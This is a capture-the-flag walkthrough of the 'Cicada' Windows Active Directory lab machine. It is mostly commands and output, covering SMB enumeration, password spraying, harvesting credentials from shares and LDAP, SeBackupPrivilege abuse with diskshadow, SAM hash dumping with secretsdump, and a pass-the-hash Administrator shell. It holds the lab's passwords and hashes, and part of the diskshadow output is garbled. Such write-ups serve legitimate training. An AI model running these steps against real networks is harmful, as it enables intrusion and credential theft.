Cicada
Last updated
Last updated
Cicada is a easy windows machine created by . The machine has Active Directory and allows us the SMB Guest login and has a read permission in HR Share which contains the txt file. The file contains the password. The username rid-brute and password spraying is used. The password is used to authenticate into LDAP as michael.wrightson. The LDAP user enumeration reveals the david.orelious password for SMB authentication. The david.orelious has a read permission in DEV share which contains the ps1 file. The file contains the emily.oscars password. We get the user flag and shell as emily.oscars with the password. The emily.oscars has a SeBackupPrivilege which can be exploited for privilege escalation with diskshadow.exe. The sam and system registry hives is backuped. The password is dumped using impacket-secretdump, with successful exploitation we get the root flag and shell as Administrator using ntlm hash.
Windows
Easy
20
28-09-2024
15-02-2025
Started the nmap and found the Active directory ports open. Due to some reason the service is showing the tcpwrapped.
nmap -Pn -sC -sV --min-rate=500 10.10.11.35
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-24 01:09 EST
Nmap scan report for cicada.htb (10.10.11.35)
Host is up (0.60s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open tcpwrapped
135/tcp open tcpwrapped
139/tcp open tcpwrapped
445/tcp open tcpwrapped
464/tcp open tcpwrapped
593/tcp open tcpwrapped
3268/tcp open tcpwrapped
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-12-24T12:54:40
|_ start_date: N/A
|_clock-skew: 6h45m12s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.90 secondsThe SMB allows the Guest login and we have a read permissions in HR shares.
nxc smb 10.10.11.35 -u 'Guest' -p '' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\Guest:
SMB 10.10.11.35 445 CICADA-DC [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL Logon server share Downloading all the files from HR shares.
nxc smb 10.10.11.35 -u 'Guest' -p '' -M spider_plus -o DOWNLOAD_FLAG=True
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\Guest:
SMB 10.10.11.35 445 CICADA-DC [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] DOWNLOAD_FLAG: True
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] STATS_FLAG: True
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL Logon server share
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.11.35.json".
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Shares: 7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Readable Shares: 2 (HR, IPC$)
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Total folders found: 0
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Total files found: 1
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size average: 1.24 KB
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size min: 1.24 KB
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size max: 1.24 KB
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File unique exts: 1 (.txt)
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Downloads successful: 1
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [+] All files processed successfully.The HR share contains the 'Notice from HR.txt' file and it contains the Password for joining the Cicada Corp! team.
cd /tmp/nxc_hosted/nxc_spider_plus/10.10.11.35/HR
cat Notice\ from\ HR.txtDear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada CorpGetting all the usernames using --rid-brute.
nxc smb 10.10.11.35 -u 'Guest' -p '' --rid-brute
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\Guest:
SMB 10.10.11.35 445 CICADA-DC [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.
SMB 10.10.11.35 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 514: CICADA\Domain Guests (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 515: CICADA\Domain Computers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 516: CICADA\Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 518: CICADA\Schema Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 519: CICADA\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 525: CICADA\Protected Users (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 526: CICADA\Key Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)Saved the output into the output.txt file and using grep for username filtration.
grep -oP '(?<=CICADA\\)[^ ]+' output.txt > usernamesPassword Spraying the obtained password and it works on michael.wrightson user.
nxc smb 10.10.11.35 -u usernames -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\DnsUpdateProxy:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\Groups:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\Dev:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE Trying different protocol authentication and we can authenticate into LDAP protocol.
nxc smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC [-] Account not found in the BloodHound database.
SMB 10.10.11.35 445 CICADA-DC [-] Error enumerating shares: The NETBIOS connection with the remote host timed out.nxc winrm 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'
WINRM 10.10.11.35 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM 10.10.11.35 5985 CICADA-DC [-] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8nxc ldap 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
LDAP 10.10.11.35 389 CICADA-DC [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.The Bloodhound can be used to enumerate the Active Directory using nxc as a ingestor for collecting bloodhound data.
First of all lets start neo4j database.
sudo neo4j start
[sudo] password for dexter:
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:20156). It is available at http://localhost:7474
There may be a short delay until the server is ready.nxc ldap 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --bloodhound --collection all --dns-server 10.10.11.35
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
LDAP 10.10.11.35 389 CICADA-DC [-] Account not found in the BloodHound database.
LDAP 10.10.11.35 389 CICADA-DC Resolved collection methods: acl, group, localadmin, objectprops, rdp, trusts, container, dcom, session, psremote
LDAP 10.10.11.35 389 CICADA-DC Done in 01M 52S
LDAP 10.10.11.35 389 CICADA-DC Compressing output into /home/dexter/.nxc/logs/CICADA-DC_10.10.11.35_2024-12-24_012806_bloodhound.zipOpen the bloodhound and upload the data and while enumerating the user, found the david.orelious password in his description. The below query is used for listing all the user.
MATCH(u:User) RETURN uAlternatively we can use ldapsearch or nxc with -users flag for user enumeration without using bloodhound.
The password can be used in SMB authentication and downloaded all the files from the share.
nxc smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3'
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.10.11.35 445 CICADA-DC Node DAVID.ORELIOUS@CICADA.HTB successfully set as owned in BloodHoundnxc smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -M spider_plus -o DOWNLOAD_FLAG=True
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] DOWNLOAD_FLAG: True
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] STATS_FLAG: True
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV READ
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.11.35.json".
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Shares: 7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Readable Shares: 5 (DEV, HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Total folders found: 33
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Total files found: 12
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size average: 1.09 KB
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size min: 23 B
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size max: 5.22 KB
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File unique exts: 6 (.pol, .txt, .ps1, .ini, .inf, .cmtx)
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Downloads successful: 12
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [+] All files processed successfully.The DEV share contains the Backup_script.ps1 file which contains the emily.oscars password.
cd /tmp/nxc_hosted/nxc_spider_plus/10.10.11.35/DEV
cat Backup_script.ps1$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"The password can be used in SMB and WINRM authentication.
nxc smb 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt
SMB 10.10.11.35 445 CICADA-DC Node EMILY.OSCARS@CICADA.HTB successfully set as owned in BloodHound
nxc winrm 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
WINRM 10.10.11.35 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM 10.10.11.35 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
WINRM 10.10.11.35 5985 CICADA-DC Node CICADA-DC.CICADA.HTB successfully set as owned in BloodHoundGetting shell using evil-winrm as emily.oscars.
evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>Running whoami /all reveals that the user has a SeBackupPrivilege.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.diskshadow.exediskshadow.exe /s .\diskshadow.txtIf the diskshadow.exe has run successfully the below output will be printed, otherwise the output will be different.
*Evil-WinRM* PS C:\Windows\Temp> diskshadow.exe /s .\diskshadow. txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
computer: CICADA-DC, 12/25/2024 12:24:02 AM
metadata .\tmp.cabs
col stent nowriters
Alias cdrive -9352-4a08-937e-d8f et as environment variable
Alias VSS_SHADOW_SET for sI w set ID {064223bf-d5e0-4e9f-aale-619af8ed770b} set as environment variable.
Querying all shadow copies with the shadow copy set ID {064223bf-d5e0-4e9f-aale-619af8ed770b}
* Shadow copy ID = {df5a3fb4-9352-4a08-937e-d8f7607 f6680} %cdrive%s
- Shadow copy set: {064223bf-d5e0-4e9f-aale-619af8ed770b} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{fcebaf9b-0000-0000-0000-500600000000}\ [C:\]
- Creation time: 12/25/2024 12:24:02 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVoLumeShadowCopy1
- Originating machine: CICADA-DC.cicada.htb
- Service machine: CICADA-DC.cicada.htb
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %cdrive% h
-> scdrive’s = {df5a3fb4-9352-4a08-937e-d8f7607f6680}
The shadow copy was successfully exposed as h.evil-winrm.impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up... evil-winrm -i 10.10.11.35 -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> The below video provides the PoC of Cicada machine.
The use flag is present in C:\Users\emily.oscars.CICADA\Desktop\user.txt
The blog post is written to exploit the SeBackupPrivilege for dumping the ntlm hashes. The exploit can be found .
The root flag is present in C:\Users\Administrator\Desktop\root.txt
